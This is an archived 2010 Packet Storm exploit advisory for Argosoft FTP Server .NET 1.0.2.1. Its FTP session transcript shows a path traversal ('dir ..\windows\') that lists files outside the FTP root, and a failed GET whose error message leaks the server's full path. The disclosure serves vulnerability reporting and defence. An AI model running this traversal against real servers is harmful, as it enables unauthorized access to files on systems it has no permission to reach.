Argosoft FTP Server .NET 1.0.2.1 Path Traversal

2010-04-27T00:00:00
ID PACKETSTORM:88951
Type packetstorm
Reporter cp77fk4r
Modified 2010-04-27T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Argosoft FTP SERVER .NET Version <= 1.0.2.1 Path Traversal  
& Full Path Disclosure.  
# Date: 23/04/10  
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il  
# Software Link: http://www.argosoft.com/rootpages/FtpServerNet/Default.aspx|  
http://www.argosoft.com/rootpages/Download.aspx  
# Version: Version <= 1.0.2.1  
# Tested on: .NET  
#  
#  
##[Path traversal:]  
The attacker can break his "root-jail" and gain access to the other local  
files on the server, E.g:  
#  
ftp> pwd  
257 "/" is working directory //[i'm  
standing on the ftp root directory]  
ftp> dir  
200 Port command successful  
150 Opening ASCII data connection  
drw-r--r-- 1 user group 0 Apr 26 18:29 tesstdir  
-rw-r--r-- 1 user group 0 Apr 26 18:29 testfile.txt  
226 Transfer complete  
ftp: 134 bytes received in 0.01Seconds 22.33Kbytes/sec.  
ftp> cd ..  
250 Requested file action OK, completed  
ftp> pwd  
257 "/" is working directory //[i'm  
still there...]  
ftp> dir ..\windows\  
200 Port command successful  
150 Opening ASCII data connection  
drw-r--r-- 1 user group 0 Nov 02 2006 addins  
drw-r--r-- 1 user group 0 Feb 25 11:24 AppPatch  
-rw-r--r-- 1 user group 1069 Apr 07 11:54 ARPR.INI  
drw-r--r-- 1 user group 0 Mar 20 19:29 assembly  
.  
.  
.  
.  
drw-r--r-- 1 user group 0 Nov 02 2006 system  
-rw-r--r-- 1 user group 219 Sep 18 2006 system.ini  
drw-r--r-- 1 user group 0 Apr 26 15:59 System32  
.  
.  
.  
.  
226 Transfer complete  
ftp: 9584 bytes received in 0.07Seconds 129.51Kbytes/sec.  
ftp> :)  
//[P0wnd! :)]  
#  
#  
##[Full Path Disclosure:]  
The attacker can get the full-path to his root directory by trying to GET  
file that don't exist, E.g:  
#  
ftp> get  
Remote file: none_exist_file  
Local file: none_exist_file  
200 Port command successful  
550 Requested file not found c:\server\none_exist_file //[In the  
Error we can see the full-path to the ftp root directory]  
#  
#  
[e0f]  
  
  
  
`